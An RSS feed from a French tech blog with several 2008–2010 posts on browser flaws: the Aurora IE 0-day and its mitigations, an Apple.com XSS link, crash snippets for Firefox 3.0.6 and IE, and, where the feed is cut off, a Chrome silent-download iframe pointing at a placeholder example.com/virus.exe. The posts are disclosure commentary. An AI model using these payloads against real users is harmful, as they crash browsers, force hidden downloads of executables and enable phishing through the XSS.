<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blogmotion &#187; exploit</title>
	<atom:link href="http://blogmotion.fr/tag/exploit/feed" rel="self" type="application/rss+xml" />
	<link>http://blogmotion.fr</link>
	<description>Culture web et nouvelles technologies informatiques</description>
	<lastBuildDate>Fri, 30 Jul 2010 10:22:33 +0000</lastBuildDate>
	<meta name="generator" content="WordPress" />
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<atom:link rel='hub' href='http://blogmotion.fr/?pushpress=hub'/>
		<item>
		<title>Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</title>
		<link>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882</link>
		<comments>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882#comments</comments>
		<pubDate>Wed, 20 Jan 2010 10:01:03 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[removal]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[stinger]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=4882</guid>
		<description><![CDATA[L&#8217;information n&#8217;est pas passée inaperçue cette semaine, c&#8217;est le moins que l&#8217;on puisse en dire. Google a annoncé avoir reçu des attaques depuis la chine et l&#8217;on apprenait il y a quelques jours qu&#8217;il s&#8217;agissait d&#8217;une faille 0-Day concernant Microsoft Internet Explorer. Cette attaque a été baptisée Aurora.

Je vous propose au travers de ce billet [...]]]></description>
			<content:encoded><![CDATA[<p>L&#8217;information n&#8217;est pas passée inaperçue cette semaine, c&#8217;est le moins que l&#8217;on puisse en dire. Google <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html">a annoncé</a> avoir <strong>reçu des attaques depuis la chine</strong> et l&#8217;on apprenait il y a quelques jours qu&#8217;il s&#8217;agissait d&#8217;une <strong>faille 0-Day concernant <a href="http://www.microsoft.com/technet/security/advisory/979352.mspx">Microsoft Internet Explorer</a></strong>. Cette attaque a été baptisée <em><strong>Aurora</strong></em>.</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-4885" style="border: 1px solid #ccc;" title="zeroday-ie" src="http://blogmotion.fr/wp-content/uploads/2010/01/zeroday-ie.png" alt="" width="590" height="100" /></p>
<p>Je vous propose au travers de ce billet un <strong>résumé de la situation</strong> qui s&#8217;éparpille dans un tous les sens sur les sites d&#8217;informations.<span id="more-4882"></span></p>
<p><strong>Internet explorer 6, 7 et 8</strong> sont impactés par cette faille permettant l&#8217;exécution de code arbitraire à distance (remote shell). Microsoft annonce d&#8217;ores et déjà qu&#8217;un <a href="http://blogs.technet.com/msrc/archive/2010/01/19/security-advisory-979352-going-out-of-band.aspx"><strong>correctif d&#8217;urgence</strong> sera beinttôt  disponible</a> sans pour autant attendre les patch Tuesday (tous les deuxièmes mardi de chaque mois). <strong>Microsoft tente de minimiser cette information</strong> en recommandant aux utilisateurs de IE 6 &amp; 7 de migrer vers la version 8 dans laquelle la protection <em>Data Execution Prevention</em> est activée par défaut.</p>
<p>Personnellement <strong>je vous conseille d&#8217;utiliser un navigateur alternatif</strong> tel que Firefox, Opera reconnus stable et sans failles béantes.</p>
<p>Voici l&#8217;information officielle des contacts Microsoft Entreprise :</p>
<blockquote><p><span style="text-decoration: underline;">Internet Explorer 6 </span><br />
Windows 2000 : Exploitable<br />
Windows XP :  Exploitable (et exploité)<br />
Windows Vista et 7 : néant</p>
<p><span style="text-decoration: underline;">Internet Explorer 7 </span><br />
Windows 2000 : néant (IE 7 n’est pas disponible pour Windows 2000) Windows XP : Potentiellement exploitable mais l’attaque en cours est sans effet<br />
Windows Vista  : grâce au mode protégé d’IE, l’exploitation ne fonctionne pas.<br />
Windows 7 : néant</p>
<p><span style="text-decoration: underline;">Internet Explorer 8 </span><br />
Windows 2000 : néant (IE 8 n’est pas disponible pour Windows 2000)<br />
Windows XP : Grâce à la protection DEP active par défaut sur Windows XP SP3, l’exploitation ne fonctionne pas.<br />
Windows Vista : Grâce au mode protégé d’IE et à la protection DEP, l’exploitation ne fonctionne pas.<br />
Windows 7 : Grâce au mode protégé d’IE et à la protection DEP actives par défaut, l’exploitation ne fonctionne pas.</p>
<p>Voici les conseils que nous vous recommandons de suivre pour mieux vous protéger si vous utilisez Windows XP avec Internet Explorer 6 :</p>
<ol>
<li>Si cela vous est possible, Installez Internet Explorer 8 ;</li>
<li>S’il ne vous est pas possible d’installer Internet Explorer 8, passez à la dernière version de Service Pack en appliquant le Service Pack 3 de Windows XP (et toutes les mises à jour postérieures au SP3) ;</li>
<li>A défaut d’appliquer le SP3, si vous utilisez Windows XP SP2, vous pouvez activer manuellement la protection DEP (Data Execution Prevention) ;</li>
<li>Mettre en œuvre les éventuelles autres solutions de contournement et atténuations citées dans l’avis de sécurité.</li>
</ol>
</blockquote>
<h3>Une faille 0-Day c&#8217;est quoi ?</h3>
<p>Une fois <strong>0-Day</strong> correspond à des attaques qui <strong>exploitent une faille d’un programme jusqu’alors inconnue</strong>. Cela va peut-être en surprendre quelques-uns, mais certaines failles sont connues des éditeurs et pas corrigées pour autant&#8230; voilà qui les différencie avec les failles 0-Day.</p>
<h3>Détecter la vulnérabilité avec Stinger</h3>
<p>George Kurtz (McAfee Chief&#8217;s Technology Officer) a publié un <a href="http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/">long billet sur son blog</a> au sujet de cette attaque Aurora que je vous invite à lire. L&#8217;éditeur antiviral McAfee a semble-t-il été le premier à comprendre que l&#8217;attaque se basait sur Internet Explorer. <strong>Une attaque très minutieuse et professionnelle</strong> <a href="http://www.01net.com/editorial/511269/comment-google-a-ete-attaque/">selon 01net</a>.</p>
<p><img class="aligncenter size-full wp-image-4891" title="operation-aurora" src="http://blogmotion.fr/wp-content/uploads/2010/01/operation-aurora.png" alt="" width="590" height="140" /></p>
<p>McAfee Labs vient de mettre un ligne l’utilitaire <strong>Stinger</strong> pour &laquo;&nbsp;Aurora&nbsp;&raquo;, celui-ci <strong>détecte et élimine les menaces associées aux attaques de l’Opération Aurora</strong>. Cet utilitaire peut être <strong>téléchargé gratuitement</strong> à partir du <a href="http://vil.nai.com/vil/averttools.aspx">McAfee Threat Center</a> (<a href="http://download.nai.com/products/mcafee-avert/aurora_stinger.exe">lien direct</a>) :</p>
<p><img class="aligncenter size-full wp-image-4883" title="mcafee-stinger" src="http://blogmotion.fr/wp-content/uploads/2010/01/mcafee-stinger.png" alt="" width="449" height="381" /></p>
<p><img class="aligncenter size-full wp-image-4884" title="mcafee-stinger-about" src="http://blogmotion.fr/wp-content/uploads/2010/01/mcafee-stinger-about.png" alt="" width="411" height="464" /></p>
<p>Le plus sage étant de mettre à jour Internet Explorer en version 8 (la 9 ne va pas tarder) et de ne plus l&#8217;utiliser comme le <a href="http://www.certa.ssi.gouv.fr/site/CERTA-2010-ALE-001/">conseille le CERTA</a>.</p>
<h3>Aurora déjà exploitée</h3>
<p><a href="http://www.metasploit.com/">Metasploit</a> (projet de sécurité open-source) a d&#8217;ores et déjà <strong>intégré l&#8217;exploit dans son framework</strong>. Un <a href="http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html">billet complet</a> à ce sujet est consultable histoire de montrer à Microsoft que cette faille est importante et qu&#8217;il ne faut pas la minimiser.</p>
<h3>Conclusion</h3>
<p>Le cas <strong>le plus problématique se trouve en entreprise</strong>. Nombreuses sont encore celles qui utilisent Internet Explorer 6 pour des <strong>questions de compatibilité</strong> avec des applications qui ne tournent pas sur les versions ultérieures ou migrer vers un autre navigateur.</p>
<p>C&#8217;est pour cette raison que Microsoft doit de toutes façon sortir un correctif.</p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 20/01/2010 |
<a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882#comments">5 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>
	<h4>Articles relatifs</h4>
	<ul class="st-related-posts">
	<li><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275" title="Une faille DoS qui plante Firefox 3.0.6 (24 février 2009)">Une faille DoS qui plante Firefox 3.0.6</a> (2)</li>
	<li><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015" title="Exploit de DoS touchant IE 6, 7 et 8 (15 janvier 2009)">Exploit de DoS touchant IE 6, 7 et 8</a> (6)</li>
	<li><a href="http://blogmotion.fr/internet/exploit-xss-apple-4339" title="Une faille XSS sur Apple.com non corrigée (4 novembre 2009)">Une faille XSS sur Apple.com non corrigée</a> (4)</li>
	<li><a href="http://blogmotion.fr/systeme/faux-antivirus-malware-4272" title="Supprimer les faux antivirus et faux antimalwares d&#8217;un PC (27 octobre 2009)">Supprimer les faux antivirus et faux antimalwares d&#8217;un PC</a> (4)</li>
	<li><a href="http://blogmotion.fr/internet/divertissement/gmail-nest-pas-le-seul-a-rencontrer-des-soucis-623" title="Gmail n&#8217;est pas le seul à rencontrer des soucis (12 août 2008)">Gmail n&#8217;est pas le seul à rencontrer des soucis</a> (0)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Une faille XSS sur Apple.com non corrigée</title>
		<link>http://blogmotion.fr/internet/exploit-xss-apple-4339</link>
		<comments>http://blogmotion.fr/internet/exploit-xss-apple-4339#comments</comments>
		<pubDate>Wed, 04 Nov 2009 09:21:22 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fail]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=4339</guid>
		<description><![CDATA[Une faille XSS est présente depuis hier déjà sur le site d&#8217;Apple. Ce billet n&#8217;a d&#8217;autre but que celui d&#8217;encourager les développeurs à corriger cette brèche.
Voici ce que l&#8217;on peut y voir en modifiant simplement certains paramètres GET de l&#8217;URL :

Pour le voir par vous même cliquez-ici (si la faille n&#8217;a pas encore été corrigée).
A [...]]]></description>
			<content:encoded><![CDATA[<p>Une <a href="http://fr.wikipedia.org/wiki/Cross-site_scripting"><strong>faille XSS</strong></a> est présente depuis hier déjà sur le site d&#8217;<strong>Apple</strong>. Ce billet n&#8217;a d&#8217;autre but que celui d&#8217;encourager les développeurs à corriger cette brèche.</p>
<p>Voici ce que l&#8217;on peut y voir en modifiant simplement certains paramètres GET de l&#8217;URL :</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-4341" style="border: 1px solid #ccc;" title="faille-xss-apple" src="http://blogmotion.fr/wp-content/uploads/2009/11/faille-xss-apple.png" alt="faille-xss-apple" width="588" height="480" /></p>
<p><span id="more-4339"></span>Pour le voir par vous même <a href="http://www.apple.com/fr/itunes/affiliates/download/?artistName=Apple%20&amp;thumbnailUrl=http://www.cedynamix.fr/wp-content/uploads/Tux/Tux-G2.png&amp;itmsUrl=http://fr.wikipedia.org/wiki/Cross-site_scripting&amp;albumName=%3Ca%20href=%22http://fr.wikipedia.org/wiki/Cross-site_scripting%22%3Eune%20faille%20XSS%3C/a%3E%20made">cliquez-ici</a> (si la faille n&#8217;a pas encore été corrigée).</p>
<p>A l&#8217;époque des liens raccourcis il est très facile de piéger une victime en profitant de cette faille XSS&#8230; <strong>pourquoi la société à la pomme  ne corrige-t-elle pas cette brèche</strong> ?</p>
<p><em>Via un tweet de <a href="http://twitter.com/mar1e">Mar1e</a></em></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/exploit-xss-apple-4339">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 04/11/2009 |
<a href="http://blogmotion.fr/internet/exploit-xss-apple-4339#comments">4 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>
	<h4>Articles relatifs</h4>
	<ul class="st-related-posts">
	<li><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275" title="Une faille DoS qui plante Firefox 3.0.6 (24 février 2009)">Une faille DoS qui plante Firefox 3.0.6</a> (2)</li>
	<li><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882" title="Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora (20 janvier 2010)">Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</a> (5)</li>
	<li><a href="http://blogmotion.fr/systeme/failles-google-chrome-772" title="Failles Google Chrome (4 septembre 2008)">Failles Google Chrome</a> (5)</li>
	<li><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015" title="Exploit de DoS touchant IE 6, 7 et 8 (15 janvier 2009)">Exploit de DoS touchant IE 6, 7 et 8</a> (6)</li>
	<li><a href="http://blogmotion.fr/mobilite/test-ipad-5402" title="Un test français de l&#8217;iPad différent des autres (15 avril 2010)">Un test français de l&#8217;iPad différent des autres</a> (6)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/exploit-xss-apple-4339/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Une faille DoS qui plante Firefox 3.0.6</title>
		<link>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275</link>
		<comments>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275#comments</comments>
		<pubDate>Tue, 24 Feb 2009 22:58:33 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[crash]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[mozilla]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[plantage]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=2275</guid>
		<description><![CDATA[Une possibilité de crash de Firefox (version 3.0.6 incluse) vient d&#8217;être révélée.
Le code source concerne la balise &#171;&#160;BODY onload&#160;&#187; :
&#60;BODY onload="
document.designMode='on';
document.removeChild(document.firstChild);
document.queryCommandState('BackColor');
"&#62;
Ce qui provoque :

Cette faille active le mode d&#8217;édition &#171;&#160;rich text&#160;&#187; (variable), puis enlève le noeud (objet) pour ensuite intérroger l&#8217;état actuel de la commande &#8216;BackColor&#8217; (qui n&#8217;existe plus étant donné que le noeud a [...]]]></description>
			<content:encoded><![CDATA[<p>Une possibilité de <strong>crash</strong> de <strong>Firefox</strong> (version <strong>3.0.6</strong> incluse) vient d&#8217;être révélée.</p>
<p>Le code source concerne la balise &laquo;&nbsp;<strong>BODY onload</strong>&nbsp;&raquo; :</p>
<pre>&lt;BODY onload="
document.designMode='on';
document.removeChild(document.firstChild);
document.queryCommandState('BackColor');
"&gt;</pre>
<p>Ce qui provoque :</p>
<p><a href="http://blogmotion.fr/wp-content/uploads/2009/02/firefox-faille-plantage.png" rel="shadowbox[post-2275];player=img;"><img class="aligncenter size-medium wp-image-2276" title="firefox-faille-plantage" src="http://blogmotion.fr/wp-content/uploads/2009/02/firefox-faille-plantage.png" alt="" width="512" height="411" /><span id="more-2275"></span></a></p>
<p>Cette faille active le <a href="http://blogmotion.fr/internet/modifier-une-page-web-en-javascript-wysiwyg-1184">mode d&#8217;édition &laquo;&nbsp;rich text&nbsp;&raquo;</a> (variable), puis enlève le noeud (objet) pour ensuite intérroger l&#8217;état actuel de la commande &#8216;BackColor&#8217; (qui n&#8217;existe plus étant donné que le noeud a été supprimé), et Firefox ne sait plus quoi faire, donc il plante&#8230; enfin c&#8217;est ce que j&#8217;en ai compris, si votre explication est meilleure les commentaires sont open !</p>
<p>En espérant que Mozilla <strong>colmate la faille</strong> assez <strong>rapidement</strong> parce que j&#8217;en connais qui vont s&#8217;arracher les cheveux si Firefox se ferme sans prévenir, la restauration des onglets ouverts avant le plantage ne suffisant pas toujours pour récupérer des textarea notamment <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://blogmotion.fr/wp-content/uploads/2009/02/exploit-firefox-306.html">Démo : cliquez ici pour planter Firefox (v3.0.7 max)</a></p></p>
<p><em><a href="http://www.milw0rm.com/exploits/8091">Source</a></em></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 24/02/2009 |
<a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275#comments">2 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>
	<h4>Articles relatifs</h4>
	<ul class="st-related-posts">
	<li><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015" title="Exploit de DoS touchant IE 6, 7 et 8 (15 janvier 2009)">Exploit de DoS touchant IE 6, 7 et 8</a> (6)</li>
	<li><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882" title="Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora (20 janvier 2010)">Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</a> (5)</li>
	<li><a href="http://blogmotion.fr/internet/firefox-interesse-yahoo-1089" title="Firefox s&#8217;intéresse-t-il à Yahoo! ? (9 octobre 2008)">Firefox s&#8217;intéresse-t-il à Yahoo! ?</a> (3)</li>
	<li><a href="http://blogmotion.fr/systeme/failles-google-chrome-772" title="Failles Google Chrome (4 septembre 2008)">Failles Google Chrome</a> (5)</li>
	<li><a href="http://blogmotion.fr/internet/youtube-vous-conseille-google-chrome-1394" title="Youtube vous conseille Google Chrome (4 novembre 2008)">Youtube vous conseille Google Chrome</a> (6)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Exploit de DoS touchant IE 6, 7 et 8</title>
		<link>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015</link>
		<comments>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015#comments</comments>
		<pubDate>Thu, 15 Jan 2009 09:28:52 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Système]]></category>
		<category><![CDATA[déni]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[service]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=2015</guid>
		<description><![CDATA[Un déni de service vient d&#8217;être découvert au sein du navigateur de Microsoft, Internet Explorer. Les versions touchées par cette exploit sont : Internet Explorer 6, 7 et 8 beta 2 (sera corrigé dans la 8.0 rc1).

Le principe est relativement simple : on demande à IE de lire le contenu d&#8217;un pointeur vide au chargement [...]]]></description>
			<content:encoded><![CDATA[<p>Un <a href="http://fr.wikipedia.org/wiki/Denial_of_service">déni de service</a> vient d&#8217;être découvert au sein du navigateur de Microsoft, <strong>Internet Explorer</strong>. Les versions touchées par cette exploit sont : <strong>Internet Explorer 6, 7 et 8 beta 2</strong> (sera corrigé dans la 8.0 rc1).</p>
<p><img class="aligncenter size-full wp-image-2018" title="ie-exploit-demo" src="http://blogmotion.fr/wp-content/uploads/2009/01/ie-exploit-demo.png" alt="" width="419" height="262" /></p>
<p>Le principe est relativement simple : on demande à IE de lire le contenu d&#8217;un <strong>pointeur vide</strong> au chargement de la page <a href="http://blogmotion.fr/wp-content/uploads/2009/01/exploit-ie.htm">(cliquez ici pour essayer)</a> :</p>
<pre>&lt;body onload=screen[""]&gt;<span id="more-2015"></span></pre>
<p><strong>Rien d&#8217;alarmant</strong> toutefois puisque IE considère le code comme potentiellement dangereux :</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-2017" style="border: 1px solid #ccc;" title="ie-exploit-avertissement" src="http://blogmotion.fr/wp-content/uploads/2009/01/ie-exploit-avertissement.png" alt="" width="590" height="117" /></p>
<p style="text-align: left;">M&#8217;enfin c&#8217;est tout de même <strong>pas rassurant</strong> de voir que de tels exploits soit encore d&#8217;actualité dans les versions 7 et 8 d&#8217;Intenet Explorer (IE 6 encore je veux bien&#8230;).</p>
<p style="text-align: left;">On se souvient par ailleurs du fameux site de <a href="http://blogmotion.fr/internet/comment-crasher-internet-explorer-6-ie-6-108">crash IE</a> <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: left;"><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://firefox.com">Télécharger Firefox</a></p></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 15/01/2009 |
<a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015#comments">6 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>
	<h4>Articles relatifs</h4>
	<ul class="st-related-posts">
	<li><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275" title="Une faille DoS qui plante Firefox 3.0.6 (24 février 2009)">Une faille DoS qui plante Firefox 3.0.6</a> (2)</li>
	<li><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882" title="Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora (20 janvier 2010)">Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</a> (5)</li>
	<li><a href="http://blogmotion.fr/systeme/failles-google-chrome-772" title="Failles Google Chrome (4 septembre 2008)">Failles Google Chrome</a> (5)</li>
	<li><a href="http://blogmotion.fr/systeme/ie-tab-firefox-3-6-finale-5131" title="Utiliser IE Tab avec Firefox 3.6 (1 mars 2010)">Utiliser IE Tab avec Firefox 3.6</a> (2)</li>
	<li><a href="http://blogmotion.fr/internet/exploit-xss-apple-4339" title="Une faille XSS sur Apple.com non corrigée (4 novembre 2009)">Une faille XSS sur Apple.com non corrigée</a> (4)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Failles Google Chrome</title>
		<link>http://blogmotion.fr/systeme/failles-google-chrome-772</link>
		<comments>http://blogmotion.fr/systeme/failles-google-chrome-772#comments</comments>
		<pubDate>Thu, 04 Sep 2008 07:33:20 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Système]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exe]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[téléchargement]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=772</guid>
		<description><![CDATA[Le navigateur de Google reste en version bêta, trop de gens ont tendance à l&#8217;oublier ! Surement à cause du fait que trop de sites internet s&#8217;affichent en version bêta (et Google est loin d&#8217;être le dernier dans ce domaine !).
C&#8217;est donc tombé, 2 failles DoS (Denial of Service) pour Google Chrome.
Vous êtes septiques et [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignright size-full wp-image-775" style="margin: 5px;" title="gc-exploit" src="http://xhark.fr.nf/wp-content/uploads/2008/09/gc-exploit.png" alt="" width="100" height="112" />Le <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">navigateur de Google</a> reste en version bêta, trop de gens ont tendance à l&#8217;oublier ! Surement à cause du fait que trop de sites internet s&#8217;affichent en version bêta (et Google est loin d&#8217;être le dernier dans ce domaine !).</p>
<p>C&#8217;est donc tombé, 2 failles DoS (Denial of Service) pour <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome.<span id="more-772"></span></a></p>
<p style="text-align: justify;"><p style="border-top: 2px solid rgb(181, 212, 254); border-bottom: 2px solid rgb(181, 212, 254); padding: 5px 20px 5px 45px; background: rgb(248, 250, 252) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/info.gif) no-repeat scroll 15px 50%;color: rgb(94, 98, 115); text-align: left;">Vous êtes septiques et pensez que ces failles doitvent encore mériter de nombreuses bidouilles ?</p></p>
<h2 style="text-align: justify;">1 &#8211; La Faille DoS</h2>
<p style="text-align: justify;">Ouvre <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome</a> et revenez sur cet article, puis <a href="xhark:%">survollez ce texte avec votre souris (le clic n&#8217;est même pas nécessaire)</a>. Alors heureux ? Ah oui, très heureux <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Le simple fait de mettre &laquo;&nbsp;xhark:%&nbsp;&raquo; dans la barre d&#8217;adresse fait planter <a href="http://xhark.fr.nf/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743">Google Chrome</a> (aucun rapport avec moi, vous pouvez mettre &laquo;&nbsp;toto%&nbsp;&raquo;) . Je dis bien Google Chrome et non l&#8217;onglet en cours, car Google avait prévu de parquer chaque onglet pour ne pas avoir un navigateur complètement planté à cause d&#8217;un seul onglet. Résultat : c&#8217;est pas le cas, Chrome plante complètement :</p>
<p style="text-align: center;"><img class="size-full wp-image-773 aligncenter" title="google-chrome-faille" src="http://xhark.fr.nf/wp-content/uploads/2008/09/google-chrome-faille.png" alt="" width="447" height="169" /></p>
<p style="text-align: justify;">J&#8217;ai testé la faille sur XP SP3 et Vista SP1, tous deux impactés.</p>
<p style="text-align: justify;">Le problème vient du fichier chrome.dll (version 0.2.149.27), en fait le navigateur ne comprend pas le type de fichier envoyé et plante.</p>
<h2 style="text-align: justify;">2 &#8211; La faille du téléchargement automatique</h2>
<p style="text-align: justify;">Cette faille est beaucoup plus préoccupante que la première&#8230; elle permet de forcer un téléchargement sur votre machine, sans aucune confirmation (un exécutable ou virus par exemple), via une simple iframe (fonctionne sur Vista SP1 et XP SP3) :</p>
<p><p style="border-left: 5px solid rgb(195, 215, 234); padding: 5px 20px 5px 10px; background: rgb(240, 240, 240) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/noicon.gif) no-repeat scroll 10px 5px; font-family: Courier New,Courier,mono,times new roman; line-height: 150%; color: rgb(102, 102, 102);">&lt;script&gt;<br />
document.write(&#8216;&lt;iframe src=&nbsp;&raquo;http://www.example.com/virus.exe&nbsp;&raquo; frameborder=&nbsp;&raquo;0&#8243; width=&nbsp;&raquo;0&#8243; height=&nbsp;&raquo;0&#8243;&gt;&#8217;);<br />
&lt;/script&gt;</p></p>
